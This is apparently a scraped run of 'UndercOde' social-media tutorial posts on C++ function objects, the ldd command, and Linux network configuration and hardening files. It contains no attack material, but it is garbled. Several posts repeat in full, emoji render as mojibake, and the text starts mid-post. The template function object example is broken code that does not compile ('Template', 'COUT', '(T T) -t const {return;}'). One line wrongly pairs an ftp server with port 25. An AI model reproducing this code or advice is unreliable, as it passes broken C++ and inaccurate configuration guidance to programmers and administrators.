Generally, function objects do not define constructors and destructors. Therefore, no problems occur during the creation and destruction process. As mentioned earlier, the compiler can inline overloaded operator code, so it avoids runtime problems related to function calls.
In order to complete the above example, we use the main function main () to implement the parameters of Callback ():
int main ()
{
Callback (5, Negate ()); // output-5
}
This example passes the integer 5 and a temporary Negate The object goes to Callback (), and the program outputs -5.
Template function object
As can be seen from the above example, its data type is limited to int, and universality is one of the advantages of function objects. How to create a function object with universality? The method is to use a template, i.e. the overloaded operator "()" is defined as a template class members, so that the function is suitable for any type of data objects: The double, _int64 or char:
class GenericNegate
{
public:
Template <class T> T operator () (T T) -t const {return;}
};
int main ()
{
GenericNegate o negate;
COUT << o negate (5.3333); // Double
COUT << o negate (10000000000i64); // the __int64
}
If ordinary It is quite difficult to implement the above flexibility with a callback function.
Function Objects in the
π¦ Programming Techniques-Defining Function Objects full by UndercOde :
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
Although function pointers are widely used to implement function callbacks, C ++ also provides an important implementation of callback functions Method, that's the function object. Function objects (also called "operators") are ordinary class objects that override the "()" operator. So syntactically, function objects behave similarly to ordinary functions.
π¦ There are several advantages to using function objects instead of function pointers.
1) First, because objects can be modified internally without changing external interfaces, the design is more flexible and flexible.
2) Function objects also have data members that store the results of previous calls. When using ordinary functions, the results of previous calls need to be stored in global or local static variables, but global or local static variables have certain defects that we do not want to see.
Second, the compiler can implement inline calls in function objects, which further enhances performance.
3) This is almost impossible to achieve in function pointers.
The following example illustrates how to define and use function objects. First, declare a normal class and overload the "()" operator:
class Negate
{
public:
int operator () (int n) {return -n;}
}; In the
4) overloaded operation statement, remember the first circle Brackets are always empty because they represent overloaded operator names; the second parenthesis is a parameter list. Generally, when overloading an operator, the number of parameters is fixed, but when overloading the "()" operator, it is different. It can have any number of parameters.
Because the built-in operation in Negate is unary (only one operand), the overloaded "()" operator also has only one parameter. The return type is the same as the parameter type-in ββthis case, int. The function returns an integer with the opposite sign as the argument.
π¦ Using Function Objects
We now define a function called Callback () to test the function object. Callback () takes two parameters: one for int and one for a reference to the class Negate. Callback () treats the function object neg as a normal function name:
#include <iostream>
using std :: cout;
void Callback (int n, Negate & neg)
{
int val = neg (n); // Call the overloaded Operator "()"
cout << val;
} In
unnecessary code, note that neg is an object, not a function. The compiler translates the statement
int val = neg (n);
into
int val = neg.operator () (n);
Generally, function objects do not define constructors and destructors. Therefore, no problems occur during the creation and destruction process. As mentioned earlier, the compiler can inline overloaded operator code, so it avoids runtime problems related to function calls.
In order to complete the above example, we use the main function main () to implement the parameters of Callback ():
int main ()
{
Callback (5, Negate ()); // output-5
}
This example passes the integer 5 and a temporary Negate The object goes to Callback (), and the program outputs -5.
Template function object
As can be seen from the above example, its data type is limited to int, and universality is one of the advantages of function objects. How to create a function object with universality? The method is to use a template, i.e. the overloaded operator "()" is defined as a template class members, so that the function is suitable for any type of data objects: The double, _int64 or char:
class GenericNegate
{
public:
Template <class T> T operator () (T T) -t const {return;}
};
int main ()
{
GenericNegate o negate;
COUT << o negate (5.3333); // Double
COUT << o negate (10000000000i64); // the __int64
}
If ordinary It is quite difficult to implement the above flexibility with a callback function.
Function Objects in the
Standard Library The C ++ Standard Library defines several useful function objects that can be put into STL algorithms. For example, the sort () algorithm takes a
predicate object as its third parameter. The judgment object is a
templated function object that returns a Boolean result . You can pass greater <> or less <> to sort () to force ascending or descending sort order:
#include <functional> // for greater <> and less <>
#include <algorithm>
#include <vector>
using namespace std;
int main ()
{
vector <int> vi;
// .. fill the vector
sort (vi.begin (), vi.end (), greater <int> ()); // Descending (descending)
sort (vi.begin (), vi.end (), less <int> ()); // ascending (ascending)
}
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
predicate object as its third parameter. The judgment object is a
templated function object that returns a Boolean result . You can pass greater <> or less <> to sort () to force ascending or descending sort order:
#include <functional> // for greater <> and less <>
#include <algorithm>
#include <vector>
using namespace std;
int main ()
{
vector <int> vi;
// .. fill the vector
sort (vi.begin (), vi.end (), greater <int> ()); // Descending (descending)
sort (vi.begin (), vi.end (), less <int> ()); // ascending (ascending)
}
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Programming Techniques-Finding Related Library Files for a Command by Underc0de :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) When making your own distribution, you often need to determine which library files are required for a command Support to ensure that the specified command can be run reliably in a separate system.
2) In the Linux environment, this can be achieved through the ldd command, and executed on the console:
ldd / bin / ls
can get a list of related library files of the / bin / ls command.
3) Query what library files are used by a command
For example, to know what library files are used by ls, you can use:
$ ldd / bin / ls is
shown below (redhat as example ):
libtermcap.so.2 => /lib/libtermcap.so. 2 (0x40019000)
libc.so.6 => /lib/i686/libc.so.6 (0x42000000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Programming Techniques-Finding Related Library Files for a Command by Underc0de :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) When making your own distribution, you often need to determine which library files are required for a command Support to ensure that the specified command can be run reliably in a separate system.
2) In the Linux environment, this can be achieved through the ldd command, and executed on the console:
ldd / bin / ls
can get a list of related library files of the / bin / ls command.
3) Query what library files are used by a command
For example, to know what library files are used by ls, you can use:
$ ldd / bin / ls is
shown below (redhat as example ):
libtermcap.so.2 => /lib/libtermcap.so. 2 (0x40019000)
libc.so.6 => /lib/i686/libc.so.6 (0x42000000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed ββOptimization-Detailed Network Configuration File for Tuning Linux Network Performance FULL by Underc0de
PART 1
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) In "Debugging Tools for Tuning Linux Network Performance", we introduced the route , Netstat, tcpdump three network tuning test tools and their achievable functions. In this article, we will focus on the contents of network configuration files to help you understand these files.
> /etc/modules.conf file
2) This configuration file defines the parameter information of various modules that need to be loaded at startup. Here we mainly focus on the configuration of the network card.
3) To reduce possible problems during startup, the Linux kernel does not automatically detect multiple network cards. For a system that does not compile the driver of the network card into the kernel but dynamically loads it as a module
4) if you need to install multiple network cards, you should configure it in the "modules.conf" file. If the device driver is compiled into a module (kernel module): For PCI devices, the module will automatically detect all devices that have been installed on the system; for ISA cards, you need to provide the module with an IO address so that the module knows where Look for the card, this information is provided in "/etc/conf.modules".
5) For example, we have two 3c509 cards with ISA bus. One IO address is 0x300 and the other is 0x320. Edit the "modules.conf" file as follows:
alias eth0 3c509
alias eth1 3c509
options 3c509 io = 0x300,0x320
6) For PCI cards, you only need the alias command to associate ethN with the appropriate driver module name, and the IO address of the PCI card will be automatically Detected. For PCI cards, edit the "modules.conf" file as follows:
alias eth0 3c905
alias eth1 3c905
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed ββOptimization-Detailed Network Configuration File for Tuning Linux Network Performance FULL by Underc0de
PART 1
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) In "Debugging Tools for Tuning Linux Network Performance", we introduced the route , Netstat, tcpdump three network tuning test tools and their achievable functions. In this article, we will focus on the contents of network configuration files to help you understand these files.
> /etc/modules.conf file
2) This configuration file defines the parameter information of various modules that need to be loaded at startup. Here we mainly focus on the configuration of the network card.
3) To reduce possible problems during startup, the Linux kernel does not automatically detect multiple network cards. For a system that does not compile the driver of the network card into the kernel but dynamically loads it as a module
4) if you need to install multiple network cards, you should configure it in the "modules.conf" file. If the device driver is compiled into a module (kernel module): For PCI devices, the module will automatically detect all devices that have been installed on the system; for ISA cards, you need to provide the module with an IO address so that the module knows where Look for the card, this information is provided in "/etc/conf.modules".
5) For example, we have two 3c509 cards with ISA bus. One IO address is 0x300 and the other is 0x320. Edit the "modules.conf" file as follows:
alias eth0 3c509
alias eth1 3c509
options 3c509 io = 0x300,0x320
6) For PCI cards, you only need the alias command to associate ethN with the appropriate driver module name, and the IO address of the PCI card will be automatically Detected. For PCI cards, edit the "modules.conf" file as follows:
alias eth0 3c905
alias eth1 3c905
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed Optimization-Detailed Network Configuration File for Tuning Linux Network Performance FULL by Underc0de PART 2
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) If the driver has been compiled into the kernel: The PCI test program at system startup will automatically find all relevant network cards. The ISA card can also be automatically detected, but in some cases, the ISA card still needs to do the following configuration work: add configuration information to "/etc/lilo.conf", the method is to use the LILO program to start parameters Information is passed to the kernel. For ISA cards, edit the "lilo.conf" file, add the following:
> the append = "ether =" 0, 0, eth0 ether = "0, 0, eth1"
/ etc / sysconfig / Network-scripts / file ethN the ifcfg-
2) in In RedHat, the configuration files of system network devices are saved in "/ etc / sysconfig / network-scripts" In the directory, ifcfg-eth0 contains the configuration information of the first network card, ifcfg-eth1 contains the configuration information of the second network card, etc.
3) If you want to manually modify the network address or add a new network interface to the new interface, you can modify the corresponding File (ifcfg-ethN) or create a new file to achieve.
DEVICE = name name indicates the name of the physical device
IPADDR = addr addr indicates the IP address assigned to the card
NETMASK = mask mask indicates the network mask
NETWORK = addr addr indicates the network address
BROADCAST = addr addr indicates the broadcast address
ONBOOT = yes / no At startup Whether to activate the card
> none: no need to start the protocol
bootp: use the bootp protocol
dhcp: use the dhcp protocol
USERCTL = yes / no whether to allow non-root users to control the device
/etc/resolv.conf file
4) This file is a configuration file used by the domain name resolver (resolver, a library that resolves IP addresses based on host names), An example is as follows:
> search domainname.com
nameserver 208.164.186.1
nameserver 208.164.186.2
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed Optimization-Detailed Network Configuration File for Tuning Linux Network Performance FULL by Underc0de PART 2
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) If the driver has been compiled into the kernel: The PCI test program at system startup will automatically find all relevant network cards. The ISA card can also be automatically detected, but in some cases, the ISA card still needs to do the following configuration work: add configuration information to "/etc/lilo.conf", the method is to use the LILO program to start parameters Information is passed to the kernel. For ISA cards, edit the "lilo.conf" file, add the following:
> the append = "ether =" 0, 0, eth0 ether = "0, 0, eth1"
/ etc / sysconfig / Network-scripts / file ethN the ifcfg-
2) in In RedHat, the configuration files of system network devices are saved in "/ etc / sysconfig / network-scripts" In the directory, ifcfg-eth0 contains the configuration information of the first network card, ifcfg-eth1 contains the configuration information of the second network card, etc.
3) If you want to manually modify the network address or add a new network interface to the new interface, you can modify the corresponding File (ifcfg-ethN) or create a new file to achieve.
DEVICE = name name indicates the name of the physical device
IPADDR = addr addr indicates the IP address assigned to the card
NETMASK = mask mask indicates the network mask
NETWORK = addr addr indicates the network address
BROADCAST = addr addr indicates the broadcast address
ONBOOT = yes / no At startup Whether to activate the card
> none: no need to start the protocol
bootp: use the bootp protocol
dhcp: use the dhcp protocol
USERCTL = yes / no whether to allow non-root users to control the device
/etc/resolv.conf file
4) This file is a configuration file used by the domain name resolver (resolver, a library that resolves IP addresses based on host names), An example is as follows:
> search domainname.com
nameserver 208.164.186.1
nameserver 208.164.186.2
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PART 3 Speed Optimization-Detailed Network Configuration File for Tuning Linux Network Performance FULL by Underc0de
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) "search domainname.com" means that when a host name is provided that does not include the full domain name, add the suffix of domainname.com after the host name; "nameserver" Indicates that the host specified by this address is used as the name server when resolving the domain name. The domain name server is queried in the order in which they appear in the file.
/etc/host.conf file
3) This file specifies how to resolve host names. Linux uses the resolver library to obtain the IP address corresponding to the host name. The following is an example of "/etc/host.conf":
order bind, hosts
γγmulti on
γγospoof on
3) "order bind, hosts" specifies the order of host name query. It is specified here that DNS is used to resolve the domain name, and then "/ etc / hosts "file (and vice versa).
4) "Multi on" specifies whether the hosts specified in the "/ etc / hosts" file can have multiple addresses, and hosts with multiple IP addresses are generally called multi-homed hosts.
5) "Nospoof on" means that IP address spoofing is not allowed for this server. IP spoofing is a means of attacking the security of the system. By masquerading the IP address as another computer, it can gain the trust of other computers.
/ etc / hosts file
6) When the machine starts, before it can query DNS, the machine needs to query some hostname to IP address matches. These matches are stored in the / etc / hosts file. In the absence of a domain name server, all network programs on the system query the file to resolve the IP address corresponding to a host name.
> The following is an example of a "/ etc / hosts" file:
γγIP Address Hostname Alias
γγ127.0.0.1 Localhost Gate.openarch.com
γγ208.164.186.1 gate.openarch.com Gate
γγ............
7) The leftmost column is Host IP information. The middle column is the host name. Any subsequent columns are aliases for that host. Once the machine's network profile is configured, the network should be restarted for the changes to take effect. Use the following command to restart the network: /etc/rc.d/init.d/network restart.
/etc/inetd.conf file
8) As we all know, as a server, the more service ports are open, the more difficult it is to ensure system security and stability. Therefore, the server providing specific services should be as open as possible to provide the necessary ports, and services that are not related to the server service should be closed. For example, a machine that serves as the www and ftp server should only open ports 80 and 25. Other unrelated services such as finger auth are turned off to reduce system vulnerabilities.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PART 3 Speed Optimization-Detailed Network Configuration File for Tuning Linux Network Performance FULL by Underc0de
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) "search domainname.com" means that when a host name is provided that does not include the full domain name, add the suffix of domainname.com after the host name; "nameserver" Indicates that the host specified by this address is used as the name server when resolving the domain name. The domain name server is queried in the order in which they appear in the file.
/etc/host.conf file
3) This file specifies how to resolve host names. Linux uses the resolver library to obtain the IP address corresponding to the host name. The following is an example of "/etc/host.conf":
order bind, hosts
γγmulti on
γγospoof on
3) "order bind, hosts" specifies the order of host name query. It is specified here that DNS is used to resolve the domain name, and then "/ etc / hosts "file (and vice versa).
4) "Multi on" specifies whether the hosts specified in the "/ etc / hosts" file can have multiple addresses, and hosts with multiple IP addresses are generally called multi-homed hosts.
5) "Nospoof on" means that IP address spoofing is not allowed for this server. IP spoofing is a means of attacking the security of the system. By masquerading the IP address as another computer, it can gain the trust of other computers.
/ etc / hosts file
6) When the machine starts, before it can query DNS, the machine needs to query some hostname to IP address matches. These matches are stored in the / etc / hosts file. In the absence of a domain name server, all network programs on the system query the file to resolve the IP address corresponding to a host name.
> The following is an example of a "/ etc / hosts" file:
γγIP Address Hostname Alias
γγ127.0.0.1 Localhost Gate.openarch.com
γγ208.164.186.1 gate.openarch.com Gate
γγ............
7) The leftmost column is Host IP information. The middle column is the host name. Any subsequent columns are aliases for that host. Once the machine's network profile is configured, the network should be restarted for the changes to take effect. Use the following command to restart the network: /etc/rc.d/init.d/network restart.
/etc/inetd.conf file
8) As we all know, as a server, the more service ports are open, the more difficult it is to ensure system security and stability. Therefore, the server providing specific services should be as open as possible to provide the necessary ports, and services that are not related to the server service should be closed. For example, a machine that serves as the www and ftp server should only open ports 80 and 25. Other unrelated services such as finger auth are turned off to reduce system vulnerabilities.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PART 4 Speed Optimization-Detailed Network Configuration File for Tuning Linux Network Performance FULL by Underc0de
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) And inetd, also known as "super server", is a daemon that monitors some network requests, and it calls the corresponding service process to process connection requests according to the network request. inetd.conf is the configuration file for inetd.
2) The inetd.conf file tells inetd which network ports to listen on and which service to start for each port. The first thing to do with a Linux system in any network environment is to understand what services the server will provide.
3) Those services that are not needed should be banned, it is better to uninstall them, so that hackers have less chance to attack the system. Check the "/etc/inetd.conf" file to see what services inetd provides. Use the comment method (add the # sign at the beginning of a line) to prohibit any unnecessary services, and then send a SIGHUP signal to the inetd process:
π¦
1) Change the permission of the file to 600.
[root @ deep] # chmod 600 /etc/inetd.conf
2) Make sure the owner of the file is root.
[root @ deep] # stat /etc/inetd.conf
3) Edit the "inetd.conf" file (vi /etc/inetd.conf) and ban all unnecessary services, such as ftp, telnet, shell, login, exec, talk, ntalk, imap, pop-2, pop-3, finger, auth, and more. If you find some services useful, don't ban them.
4) After changing the "inetd.conf" file, don't forget to send a SIGHUP signal (killall -HUP inetd) to the inetd process.
γ[root @ deep / root] # killall -HUP inetd
5) In order to ensure the security of the "inetd.conf" file, you can use the chattr command to make it immutable. To make the file immutable, just use the following command:
[root @ deep] # chattr + i /etc/inetd.conf
6) The file of the "i" attribute cannot be changed: it cannot be deleted or renamed, it cannot be created Link, you cannot write data to this file. Only the system administrator can set and clear this property. If you want to change the inetd.conf file, you must first clear the flag that does not allow changes:
[root @ deep] # chattr -i /etc/inetd.conf
7) but for things like sendmail, Named, www and other services, because they are not like finger, telnet and other services, the inet daemon starts the corresponding process to provide services when the request comes, but runs as a daemon when the system starts. For redhat linux, a linuxconfig command is provided, which can be used to interactively set whether to run related services at startup through the graphical interface. You can also use commands to set whether to start a service at startup, such as: [root @ deep] # chkconfig -level 35 named off.
/etc/hosts.allow file
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PART 4 Speed Optimization-Detailed Network Configuration File for Tuning Linux Network Performance FULL by Underc0de
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) And inetd, also known as "super server", is a daemon that monitors some network requests, and it calls the corresponding service process to process connection requests according to the network request. inetd.conf is the configuration file for inetd.
2) The inetd.conf file tells inetd which network ports to listen on and which service to start for each port. The first thing to do with a Linux system in any network environment is to understand what services the server will provide.
3) Those services that are not needed should be banned, it is better to uninstall them, so that hackers have less chance to attack the system. Check the "/etc/inetd.conf" file to see what services inetd provides. Use the comment method (add the # sign at the beginning of a line) to prohibit any unnecessary services, and then send a SIGHUP signal to the inetd process:
π¦
1) Change the permission of the file to 600.
[root @ deep] # chmod 600 /etc/inetd.conf
2) Make sure the owner of the file is root.
[root @ deep] # stat /etc/inetd.conf
3) Edit the "inetd.conf" file (vi /etc/inetd.conf) and ban all unnecessary services, such as ftp, telnet, shell, login, exec, talk, ntalk, imap, pop-2, pop-3, finger, auth, and more. If you find some services useful, don't ban them.
4) After changing the "inetd.conf" file, don't forget to send a SIGHUP signal (killall -HUP inetd) to the inetd process.
γ[root @ deep / root] # killall -HUP inetd
5) In order to ensure the security of the "inetd.conf" file, you can use the chattr command to make it immutable. To make the file immutable, just use the following command:
[root @ deep] # chattr + i /etc/inetd.conf
6) The file of the "i" attribute cannot be changed: it cannot be deleted or renamed, it cannot be created Link, you cannot write data to this file. Only the system administrator can set and clear this property. If you want to change the inetd.conf file, you must first clear the flag that does not allow changes:
[root @ deep] # chattr -i /etc/inetd.conf
7) but for things like sendmail, Named, www and other services, because they are not like finger, telnet and other services, the inet daemon starts the corresponding process to provide services when the request comes, but runs as a daemon when the system starts. For redhat linux, a linuxconfig command is provided, which can be used to interactively set whether to run related services at startup through the graphical interface. You can also use commands to set whether to start a service at startup, such as: [root @ deep] # chkconfig -level 35 named off.
/etc/hosts.allow file
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PART 5-FINAL Speed Optimization-Detailed Network Configuration File for Tuning Linux Network Performance FULL by Underc0de
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) In the / etc directory, there are two files: hosts.deny hosts.allow By configuring these two files, you can specify which machines can use these services and which cannot use them.
/ etc / services file
2) The correspondence between port numbers and standard services is defined in detail in RFC 1700 "Assigned Numbers". The "/ etc / services" file enables the server and client programs to convert the service name into a port number.
30 This table exists on each host and its file name is "/ etc / services". Only the "root" user has permission to modify this file, and under normal circumstances it is not necessary to modify this file, because this file already contains the port numbers corresponding to commonly used services. For added security, we can protect this file from unauthorized deletion and alteration. To protect this file, you can use the following command:
[root @ deep] # chattr + i / etc / services
/ etc / securetty file The
"/ etc / securetty" file allows you to specify that the "root" user can log in from that TTY device. The login program (usually "/ bin / login") needs to read the "/ etc / securetty" file. Its format is: all listed tty devices are allowed to log in. Anything that is commented out or does not exist in this file is not allowed to log in as root.
/ etc / inittab file
4) Commenting out a line in the file can prevent the computer from being shut down with Control-Alt-Delete. This is important if the server is not in a secure place.
Edit the inittab file (vi / etc / inittab) and change this line:
γca :: ctrlaltdel: / sbin / shutdown -t3 -r now
to:
#ca :: ctrlaltdel: / sbin / shutdown -t3 -r now
5) Use the following command to make the changes take effect:
[root @ deep] # / sbin / init q
/etc/rc.d/init.d/
/ etc / rc. The scripts under d / init.d / mainly contain script programs for starting services. There is no need for the average user to know the contents of the script file. So you should change the permissions of these script files.
γγ[root @ deep] # chmod -R 700 /etc/rc.d/init.d/*
6) Only root can read, write, and execute scripts in this directory.
[Back to list]
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PART 5-FINAL Speed Optimization-Detailed Network Configuration File for Tuning Linux Network Performance FULL by Underc0de
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) In the / etc directory, there are two files: hosts.deny hosts.allow By configuring these two files, you can specify which machines can use these services and which cannot use them.
/ etc / services file
2) The correspondence between port numbers and standard services is defined in detail in RFC 1700 "Assigned Numbers". The "/ etc / services" file enables the server and client programs to convert the service name into a port number.
30 This table exists on each host and its file name is "/ etc / services". Only the "root" user has permission to modify this file, and under normal circumstances it is not necessary to modify this file, because this file already contains the port numbers corresponding to commonly used services. For added security, we can protect this file from unauthorized deletion and alteration. To protect this file, you can use the following command:
[root @ deep] # chattr + i / etc / services
/ etc / securetty file The
"/ etc / securetty" file allows you to specify that the "root" user can log in from that TTY device. The login program (usually "/ bin / login") needs to read the "/ etc / securetty" file. Its format is: all listed tty devices are allowed to log in. Anything that is commented out or does not exist in this file is not allowed to log in as root.
/ etc / inittab file
4) Commenting out a line in the file can prevent the computer from being shut down with Control-Alt-Delete. This is important if the server is not in a secure place.
Edit the inittab file (vi / etc / inittab) and change this line:
γca :: ctrlaltdel: / sbin / shutdown -t3 -r now
to:
#ca :: ctrlaltdel: / sbin / shutdown -t3 -r now
5) Use the following command to make the changes take effect:
[root @ deep] # / sbin / init q
/etc/rc.d/init.d/
/ etc / rc. The scripts under d / init.d / mainly contain script programs for starting services. There is no need for the average user to know the contents of the script file. So you should change the permissions of these script files.
γγ[root @ deep] # chmod -R 700 /etc/rc.d/init.d/*
6) Only root can read, write, and execute scripts in this directory.
[Back to list]
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β